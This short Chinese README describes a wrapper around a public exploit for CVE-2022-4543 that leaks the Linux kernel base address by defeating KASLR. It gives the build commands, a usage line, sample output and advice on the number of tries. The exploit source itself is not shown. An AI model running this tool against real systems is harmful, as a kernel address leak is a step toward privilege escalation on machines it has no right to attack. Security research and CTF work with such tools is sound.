这是 willsroot 的 CVE-2022-4543 漏洞利用的封装器,可帮助你判断并获取内核基地址。
按需选择(可选):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
对于某些操作系统,请先安装静态 libc。
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
运行这两个程序后,它会根据你的偏移量给出出现频率最高的地址。
实际上,真实内核基地址在总尝试中出现的次数会超过 1/4。建议尝试次数超过 100 次。